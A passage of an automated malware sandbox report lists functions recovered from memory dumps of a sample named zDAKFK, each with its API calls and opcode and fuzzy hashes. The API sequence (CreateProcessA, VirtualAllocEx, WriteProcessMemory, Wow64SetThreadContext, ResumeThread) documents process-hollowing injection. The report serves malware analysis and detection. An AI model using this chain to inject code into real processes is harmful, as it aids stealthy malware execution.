                                                                                                                                                                      control_flow_graph 294 4a904b8-4a904b9 295 4a904bb-4a90775 294->295 296 4a90463-4a9049c 294->296 341 4a9049e call 4a91d90 296->341 342 4a9049e call 4a91d82 296->342 305 4a904a3-4a904a5 343 4a904aa call 4a92cf0 305->343 344 4a904aa call 4a92d00 305->344 345 4a904aa call 4a92d86 305->345 308 4a904af-4a904b6 341->305 342->305 343->308 344->308 345->308
Strings
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
• API String ID: 0-518715366
• Opcode ID: b755b82bf5513e1ef64a9d0d2b4630f3ced2b9b766c232aba783092219682020
• Instruction ID: f5266b9939cee6a249bd52c9eda2b96ac203f5b4389d7ef578c5b454e7418955
• Opcode Fuzzy Hash: b755b82bf5513e1ef64a9d0d2b4630f3ced2b9b766c232aba783092219682020
• Instruction Fuzzy Hash: 74912D31E4064A9FCB08EFA9D8546DDF7B2FF85304F518A29D005AF356DB70698ACB81

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 009CD71E
• GetCurrentThread.KERNEL32 ref: 009CD75B
• GetCurrentProcess.KERNEL32 ref: 009CD798
• GetCurrentThreadId.KERNEL32 ref: 009CD7F1
Memory Dump Source
• Source File: 0000000C.00000002.1766573670.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_9c0000_zDAKFK.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 4359f04f55b7cd24242cd94aac1f99dc13694ea9b3248d9225d06224d2dc18e8
• Instruction ID: 0893b80998eec2b0eef71ded65329b450f08d70ba0151f6eb1a2ee91511f181b
• Opcode Fuzzy Hash: 4359f04f55b7cd24242cd94aac1f99dc13694ea9b3248d9225d06224d2dc18e8
• Instruction Fuzzy Hash: 455134B0D01349DFDB14DFAAD548B9EBBF1EF48314F208469E019A7260DB74A984CF66

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID: $ $X t
• API String ID: 0-2151569440
• Opcode ID: 4daa1309ba087fb50c76cca01ea99033ce6eb06a29500015bc995ec07a1d936b
• Instruction ID: efdfc54a113999e13a544d5c3e17a78045307d2cc46d205751fb5767a636e02a
• Opcode Fuzzy Hash: 4daa1309ba087fb50c76cca01ea99033ce6eb06a29500015bc995ec07a1d936b
• Instruction Fuzzy Hash: 4B81AF31D10701CFDB45EF29D884659B7F1FF86314B028AA9D949AF216EB71A998CF80

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID: $ $X t
• API String ID: 0-2151569440
• Opcode ID: 7eb1778116046d3ee6ba2222ec99f071d6379084cc405e3b48a6b27f8b89bd55
• Instruction ID: b7f5e3bcaf6301673ea7597c0db36d21649c398857d87d222f400eb8141edaf3
• Opcode Fuzzy Hash: 7eb1778116046d3ee6ba2222ec99f071d6379084cc405e3b48a6b27f8b89bd55
• Instruction Fuzzy Hash: DB71A130920701CFDB45EF29D885A59B7F5FF86304B418AA8D949AF316EB71E994CF80

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID: Hbq$Hbq
• API String ID: 0-4258043069
• Opcode ID: e9bc58e476d8ee74faec937bcbb8a094833b9a52bd5b20279fbc598cf7a01437
• Instruction ID: 690acf3e31cf18da39e879506aac835c6c9771ed80de789aa72894191f12491c
• Opcode Fuzzy Hash: e9bc58e476d8ee74faec937bcbb8a094833b9a52bd5b20279fbc598cf7a01437
• Instruction Fuzzy Hash: 76815C70E102589FDF14DFA9C4946AEBBF6FF89300F24852AE409AB351DB349D46CB91

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID: (bq$Hbq
• API String ID: 0-4081012451
• Opcode ID: fb2c5058752593cbbe3c27f92eacb3231d4024cd31fa77cf6f84c9f22fe7e578
• Instruction ID: 417ad87a7e53f3f531f6138a259b5878ce2453e02513a3120c57d3b530046399
• Opcode Fuzzy Hash: fb2c5058752593cbbe3c27f92eacb3231d4024cd31fa77cf6f84c9f22fe7e578
• Instruction Fuzzy Hash: 1271AE31A006158FDB04EF7DC49056AB7E6FFC93147118969E40AAB366EF30ED45CB81

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID: X t$goX
• API String ID: 0-1672835317
• Opcode ID: 4db87896d9051a01971994d2d1833973e1d717cb0d83e2616335d3c47a0e1dab
• Instruction ID: 4110e5296d18dd16ec996a17a23d743ef8cf594cbe326b655a8746e14d91e5ac
• Opcode Fuzzy Hash: 4db87896d9051a01971994d2d1833973e1d717cb0d83e2616335d3c47a0e1dab
• Instruction Fuzzy Hash: 04212671A002008FCB05EF39C44859FBBE6EF82304B1588ADD506DB361EB30EC0A8B91

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID: X t$goX
• API String ID: 0-1672835317
• Opcode ID: f830fa06ad866bc0c3356bea22eb51d4db9b999e60c63a31c83a10d42f213a10
• Instruction ID: 5d0439e00c8700b4bc5bf758bcb0f54e9d70451cf8556ac49ec94d0487201c1e
• Opcode Fuzzy Hash: f830fa06ad866bc0c3356bea22eb51d4db9b999e60c63a31c83a10d42f213a10
• Instruction Fuzzy Hash: 2C212775A102008FCB00EF69C40889FBBF1EF81314B0088A9E546DB361EF30ED0A8B92

Control-flow Graph

APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0509E086
Memory Dump Source
• Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 6ec930b474d561ad06a4f9f3443c7bf4afc54858d4293f54058a1a32281e8a28
                                                                                                                                                                      • Instruction ID: c647f53e9fbff2cdbb44e80416c481e8e54ac87503b3528e4ea9a0c8a978a9a5
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ec930b474d561ad06a4f9f3443c7bf4afc54858d4293f54058a1a32281e8a28
                                                                                                                                                                      • Instruction Fuzzy Hash: CE916971D00219DFDF24CFA8D842BEDBBF2BB48300F1481A9E849A7254DB749985DF91

Control-flow Graph

• Control-flow graph (rendered image and executed/not-executed colouring not reproduced): function 0509DE47-0509E195, 57 basic blocks, same layout as the function above; CreateProcessA is called from the block 0509DFDF-0509E099.
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0509E086
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: 47981d47d7ac4b01ed83cf274269c60056087fc4472b4dee48b79bef53cef5e4
                                                                                                                                                                      • Instruction ID: e75b3b42d5dc5051e73176c88ba47b44970a060532b946d5879363ed7f296f10
                                                                                                                                                                      • Opcode Fuzzy Hash: 47981d47d7ac4b01ed83cf274269c60056087fc4472b4dee48b79bef53cef5e4
                                                                                                                                                                      • Instruction Fuzzy Hash: 52916971D00219DFDF14CFA8D852BEDBBF2BB48300F1481A9E849A7294DB749985DF92

Control-flow Graph

• Control-flow graph (rendered image and executed/not-executed colouring not reproduced): function 009CB401-009CB690, 60 basic blocks; GetModuleHandleW is called from the block 009CB648-009CB673; internal calls to 009CADE4, 009CADF0, 009CAE00, 009CAE10, 009CAE20, 009CB698/009CB6A8 and 009CB980/009CB9A8.
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 009CB666
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766573670.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_9c0000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                      • Opcode ID: 87ddac9976cc375b0264e47fa748cb2e724451d0de7c6ab43d1ecdfe735bd6f2
                                                                                                                                                                      • Instruction ID: 1e9bad1ec5c08c358d9643416ac78c04d156809864e8050c529acbd6eda775f3
                                                                                                                                                                      • Opcode Fuzzy Hash: 87ddac9976cc375b0264e47fa748cb2e724451d0de7c6ab43d1ecdfe735bd6f2
                                                                                                                                                                      • Instruction Fuzzy Hash: 97814670A00B458FD724DF2AD456B5ABBF5FF88304F008A2DE486DBA51DB74E845CB92
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 009C6011
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766573670.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_9c0000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                      • Opcode ID: 163489c9ba3031f8fd26ee7ffb513e7ec713b57f0b68ed445a065be07d98b9b4
                                                                                                                                                                      • Instruction ID: 1eabc89ee561bb6651b1f41e3adc7ddd1907c6f2384990162960591f3fd8f64a
                                                                                                                                                                      • Opcode Fuzzy Hash: 163489c9ba3031f8fd26ee7ffb513e7ec713b57f0b68ed445a065be07d98b9b4
                                                                                                                                                                      • Instruction Fuzzy Hash: 1141D1B0C00619CFDB24CFAAC844BDEBBF5BF49304F24816AD408AB255DB756986CF91
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 009C6011
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766573670.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_9c0000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                      • Opcode ID: 10959a3490eb7a4a9c945ead86af751436d12b9695b74185e1cce59329b88711
                                                                                                                                                                      • Instruction ID: c7c452ce7fb30e894b35f6f47e562ff9b299ca2cbe7c26c2a81d012b7753a9ee
                                                                                                                                                                      • Opcode Fuzzy Hash: 10959a3490eb7a4a9c945ead86af751436d12b9695b74185e1cce59329b88711
                                                                                                                                                                      • Instruction Fuzzy Hash: 5E41C1B0C00619CBDB24DFAAC844BDEBBF9BF49304F24806AD409BB255DB756985CF91
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0509D858
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                      • Opcode ID: f7421cf5e820bb104a0dd622721c5181d7941086a9175fc914f1d5ee2a2462a7
                                                                                                                                                                      • Instruction ID: 5f94eb890746e6f03f169559b85edf1e3477014be56337b4c204e4e457b07692
                                                                                                                                                                      • Opcode Fuzzy Hash: f7421cf5e820bb104a0dd622721c5181d7941086a9175fc914f1d5ee2a2462a7
                                                                                                                                                                      • Instruction Fuzzy Hash: 6C2146B29003099FCB10CFA9C881BDEBBF5FF48310F10842AE959A7251C778A944CBA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0509D858
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                      • Opcode ID: faff9bf6cae98bc4db9636dad792025b9af0f4a530f68d42ecf78567264b8e2d
                                                                                                                                                                      • Instruction ID: 07516afeabee5c3540a41d2c0a09dba30cdd2dd4609e4dfc65fb539ac4214369
                                                                                                                                                                      • Opcode Fuzzy Hash: faff9bf6cae98bc4db9636dad792025b9af0f4a530f68d42ecf78567264b8e2d
                                                                                                                                                                      • Instruction Fuzzy Hash: 7B2144B6D003498FCB04CFA9D8817DEBBF1FB48310F10842AE959A7250C7789994CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0509DD38
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                      • Opcode ID: 0fc8ed9a54eeb620dc4e1e0cd164007fe125e976b977dcad32e5ac242e11597a
                                                                                                                                                                      • Instruction ID: 7f2065c86cf39e740acb59eaa5875f7d9e43fc07c6daeb5afffa3c3d546410ed
                                                                                                                                                                      • Opcode Fuzzy Hash: 0fc8ed9a54eeb620dc4e1e0cd164007fe125e976b977dcad32e5ac242e11597a
                                                                                                                                                                      • Instruction Fuzzy Hash: 402157B29003499FCB14DF99C880AEEFBF1FF88310F108429E559A7254C7389941DBA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0509D776
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 7c6f9d231a3c13383d4affe7d2a3c0bfc9dc92dee18eaec5fd7ae2d4baf97d5d
                                                                                                                                                                      • Instruction ID: 624a16fd74c35d5c0cc358432e54d35134b39ffa624dd4e760a7079d028cb705
                                                                                                                                                                      • Opcode Fuzzy Hash: 7c6f9d231a3c13383d4affe7d2a3c0bfc9dc92dee18eaec5fd7ae2d4baf97d5d
                                                                                                                                                                      • Instruction Fuzzy Hash: A32179B69002098FCB10DF99D844ADEFFF5EF88320F10842AD569A7250C735A555DFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0509D6AE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: 9f5e8f3e4637813d65f9526aedf68b60f0f994af0d327cbfa9554c7273b76303
                                                                                                                                                                      • Instruction ID: 144aa7a7dd6ae1cba426c382185fd6d280fce84594ffe54bbd6198ff07137bb2
                                                                                                                                                                      • Opcode Fuzzy Hash: 9f5e8f3e4637813d65f9526aedf68b60f0f994af0d327cbfa9554c7273b76303
                                                                                                                                                                      • Instruction Fuzzy Hash: 8D214C71D043098FDB14DFAAC4857EEBBF4EF49314F10842AD559A7240C778A585CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0509DD38
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                      • Opcode ID: 1ecb4698633819c42304d876b68138dacd4c678ec1ed9b1e0d2a538a4afa0181
                                                                                                                                                                      • Instruction ID: 57a744b6eb8c9c718653f9121b77d839f78f6577e224f0fd91e57d9e427f6137
                                                                                                                                                                      • Opcode Fuzzy Hash: 1ecb4698633819c42304d876b68138dacd4c678ec1ed9b1e0d2a538a4afa0181
                                                                                                                                                                      • Instruction Fuzzy Hash: 862128B19003599FCB10DFAAC840ADEFBF5FF88310F10842AE559A7250C7349545DFA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009CD96F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766573670.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_9c0000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                                                      • Opcode ID: ee6b0f9d0a259e4d544171c9c167e5b382005d7fc16b025deff194bfc846b8d4
                                                                                                                                                                      • Instruction ID: 8ab9051c0b58b964ad6a8f6c77505f29f843c73fd4fc615d17580aa01a208325
                                                                                                                                                                      • Opcode Fuzzy Hash: ee6b0f9d0a259e4d544171c9c167e5b382005d7fc16b025deff194bfc846b8d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 4021C4B5D012589FDB10CF9AD984ADEFBF8EB48310F14841AE954A7350D374A944CFA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0509D6AE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: 71a619bb4568acf0b0c0a26825a4ee52801fd09ee6d26392b0df02efdadef984
                                                                                                                                                                      • Instruction ID: e9370ac5d2ef33142617f714cf76ada557149528c2bea6498f78ddad8d52b6e5
                                                                                                                                                                      • Opcode Fuzzy Hash: 71a619bb4568acf0b0c0a26825a4ee52801fd09ee6d26392b0df02efdadef984
                                                                                                                                                                      • Instruction Fuzzy Hash: 882168B2D043098FCB14DFA9C4807EEBBF0AB48314F10842AD559A7240CB38A984CF94
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 0a0490eb7c11ba1a0d0f4c8150181c2b3981108e86ec56667633abe20fbceea8
                                                                                                                                                                      • Instruction ID: f04d4571fa7a75eaf431e73f0ea2cce58be59181868c43794bd1213258669d83
                                                                                                                                                                      • Opcode Fuzzy Hash: 0a0490eb7c11ba1a0d0f4c8150181c2b3981108e86ec56667633abe20fbceea8
                                                                                                                                                                      • Instruction Fuzzy Hash: 571167B1D042498FCB24DFAAD4457EEFBF4EF88324F10846AD469A7210DB35A941CFA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0509D776
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: ffdded87eb92ac1bc283c5e1ae44769863ac519452983241c281950796dc2555
                                                                                                                                                                      • Instruction ID: 12e0917b27b6b9aee54dac0c74399379f482eeeb793ccd45982bb0e64ad77ec1
                                                                                                                                                                      • Opcode Fuzzy Hash: ffdded87eb92ac1bc283c5e1ae44769863ac519452983241c281950796dc2555
                                                                                                                                                                      • Instruction Fuzzy Hash: 671137B69002499FCB10DFAAC844BDEFFF5EF88320F108419E559A7250C775A544DFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 991162439d4418519b6f9f9bc67d87d6a8a1a7ccc699c34441ae57e19307a224
                                                                                                                                                                      • Instruction ID: 58930b387982e2cd3160f200a121368e5932f0b720fcb7403e92635f3ffc2060
                                                                                                                                                                      • Opcode Fuzzy Hash: 991162439d4418519b6f9f9bc67d87d6a8a1a7ccc699c34441ae57e19307a224
                                                                                                                                                                      • Instruction Fuzzy Hash: A21136B1D043498FCB24DFAAC4457DEFBF4EB88324F20842AD459A7250CB75A984CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0E261175
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1775202856.000000000E260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E260000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_e260000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: 3212bebb3060cceb850346beaa5ebdca93df44b6635a56e10f15a6af6e31ca09
                                                                                                                                                                      • Instruction ID: 1c710aee21706323277e09eb1fd1ae97fa86da72f2e6a476fea2d609a934c449
                                                                                                                                                                      • Opcode Fuzzy Hash: 3212bebb3060cceb850346beaa5ebdca93df44b6635a56e10f15a6af6e31ca09
                                                                                                                                                                      • Instruction Fuzzy Hash: AE1133B5C00349DFDB20DF9AC485BDEBBF4EB48320F10855AE958A7210C375A980CFA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 009CB666
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766573670.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_9c0000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                      • Opcode ID: 48d93c7ed48b798e480c3c63c2f9592c8dc996daf6d8ccbdaad6b515602e4fee
                                                                                                                                                                      • Instruction ID: b7e11e5d661e43b3ec54b69aead667fe2bc8051df3cb3a9e653d809b4668bfbd
                                                                                                                                                                      • Opcode Fuzzy Hash: 48d93c7ed48b798e480c3c63c2f9592c8dc996daf6d8ccbdaad6b515602e4fee
                                                                                                                                                                      • Instruction Fuzzy Hash: 9511E0B6C007498FCB10DF9AC544BDEFBF8AB89324F10852AD459B7210C375A545CFA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0E261175
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1775202856.000000000E260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E260000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_e260000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: e7ab1eeed866c702af30b74ac4e4a5de6c25171a2dbb991e5c5959bf4f8da69a
                                                                                                                                                                      • Instruction ID: 83f68c836054ff3ba573cf51103d7d19ca523c2367059bdcb76a259113f5a15f
                                                                                                                                                                      • Opcode Fuzzy Hash: e7ab1eeed866c702af30b74ac4e4a5de6c25171a2dbb991e5c5959bf4f8da69a
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A11E2B5800349DFDB10DF9AC889BDEFBF8EB48324F14855AE558A7210C375A984CFA5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID: (bq
• API String ID: 0-149360118
• Opcode ID: f4e0ee963aecf1953792d6e652c75c3cb1a857bbf28ac5883cd260dc83fddaae
• Instruction ID: 88b7e1d7d67c2bc819c80361c201d64e909f2169020ba0432cd3db42e8b7e1b8
